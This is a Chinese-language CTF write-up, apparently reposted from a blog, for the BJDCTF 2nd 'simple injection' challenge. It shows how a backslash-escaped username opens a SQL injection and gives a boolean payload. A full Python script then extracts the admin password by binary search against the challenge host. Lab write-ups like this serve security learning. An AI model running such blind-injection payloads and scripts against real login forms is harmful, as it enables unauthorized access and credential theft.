码迷,mamicode.com
首页 > 其他好文 > 详细

[BJDCTF 2nd]简单注入

时间:2020-05-15 00:16:44      阅读:159      评论:0      收藏:0      [点我收藏+]

标签:referer   data   style   读取   gen   where   encode   print   shadow   

 

技术图片

 

访问robots.txt得到提示:hint.txt,访问hint.txt


技术图片

select * from users where username=‘$_POST["username"]‘ and password=‘$_POST["password"]‘;

 

如果传入username=admin\ password=123456#
就会变成

select * from users where username=‘admin\‘ and password=‘123456#‘;

可以理解为 

select * from users where username=‘admin and password=‘ 恶意代码 #‘;

 

post

username=admin\ password=^(ascii(substr(password,1,1))>1000)#

 

直接读取password的值


技术图片

 

回显BJD needs to be stronger


技术图片

 

上脚本

# coding:utf-8 
import requests
import time
url = http://72f5c3af-6509-4ecf-b923-36e9d7459c00.node3.buuoj.cn/
headers = {
    Host: 72f5c3af-6509-4ecf-b923-36e9d7459c00.node3.buuoj.cn,
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0,
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8,
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
    Accept-Encoding: gzip, deflate,
    Content-Type: application/x-www-form-urlencoded,
    Content-Length: 65,
    Origin: http://72f5c3af-6509-4ecf-b923-36e9d7459c00.node3.buuoj.cn,
    Connection: close,
    Referer: http://72f5c3af-6509-4ecf-b923-36e9d7459c00.node3.buuoj.cn/,
    Upgrade-Insecure-Requests: 1
}
res = ‘‘
for i in range(1,21):
    print(i)
    left = 31
    right = 128
    mid = left + ((right - left)>>1)
    while left < right:
        data = {
            username:admin\\,
            password:^(ascii(substr(password,{},1))>{})#.format(i,mid)
            }
        r = requests.post(url = url, headers = headers, data = data)
        time.sleep(1)
        #print(mid)
        if r.status_code == 429:
            print(too fast)
            time.sleep(2)
        if BJD needs to be stronger not in r.text:
            left = mid + 1
        elif BJD needs to be stronger  in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    res += chr(mid)
    print(str(mid),res)
#password=OhyOuFOuNdit

 

用户名为admin,密码为OhyOuFOuNdit,登录即可得到flag

[BJDCTF 2nd]简单注入

标签:referer   data   style   读取   gen   where   encode   print   shadow   

原文地址:https://www.cnblogs.com/mech/p/12892071.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!